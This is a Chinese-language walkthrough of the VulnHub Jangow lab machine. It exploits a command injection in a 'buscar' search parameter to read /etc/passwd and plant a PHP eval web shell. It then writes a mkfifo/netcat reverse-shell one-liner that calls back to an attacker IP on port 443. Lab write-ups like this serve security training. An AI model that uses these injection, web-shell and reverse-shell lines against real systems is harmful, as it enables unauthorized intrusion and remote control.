靶场地址:https://www.vulnhub.com/entry/jangow-101,754/
靶场IP:192.168.56.118
信息收集
使用御剑对目标进行扫描
该靶标开启了21、80两个端口,21端口运行服务为ftp,其版本为 vsftpd 3.0.3 ,80端口运行服务为Apache httpd 2.4.18,系统信息为 Linux 3.X|4.X
首先呢,我们访问80端口看有什么发现
可以看到这是一个目录遍历,有一个site目录,操作系统为Ubuntu,点击site目录
跳转到一个Web页面,页面右上角有三个模块,点击之后就是当前页面的下面部分,但是点击Buscar模块页面出现空白,但是出现如下链接
http://192.168.56.118/site/busque.php?buscar=
可以看到buscar未被赋值,猜测应该是代码执行或者是命令执行漏洞,那么就尝试一下输入命令看有无返回信息。
cat /etc/passwd
我们看到这种一般是目录扫描,但是有可控的参数,那就试试
发现在点击Buscar时出现以下接口给上命令且执行成功
GetShell
在此命令执行处拼接以下代码尝试直接GetShell
echo '<?php phpinfo();@eval($_POST[cmd]); ?>' > heihei.php
访问heihei.php文件
然后用蚁剑连接
测试连接,可以连接,那就继续
发现常规nc反弹shell失败,可能是nc不支持-e参数,使用mkfifo命令创建命名管道反弹shell,使用蚁剑在/var/www/html/site/下面新建shell.php文件。
写入
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.233 443 >/tmp/f');?>
然后kali监听自己的443端口:nc -lvvp 443
为什么选择了443端口?因为其他的端口都反弹不了,可能是靶机做了限制,只有443端口是可行的。
浏览器去访问site下的shell.php文件
成功访问
扫一扫
2734
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
